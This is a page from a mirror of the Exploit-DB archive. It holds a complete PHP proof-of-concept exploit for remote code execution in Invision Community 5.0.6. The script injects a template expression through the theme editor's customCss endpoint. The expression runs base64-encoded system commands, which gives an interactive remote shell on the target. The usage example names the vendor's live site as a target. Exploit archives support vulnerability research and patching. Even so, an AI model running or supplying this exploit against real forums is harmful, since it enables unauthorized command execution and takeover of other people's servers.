bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/52294.php
Exploit-DB 8bc45b368a DB: 2025-05-19 
4 changes to exploits/shellcodes/ghdb

Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation

CrushFTP 11.3.1 - Authentication Bypass

Invision Community 5.0.6 - Remote Code Execution (RCE)
2025-05-19 00:16:30 +00:00

56 lines
No EOL
2 KiB
PHP
Raw Permalink Blame History

<?php
/*
---------------------------------------------------------------------------
Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/invision/";
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
die();
}
$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
while (1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
Reference in a new issue View git blame Copy permalink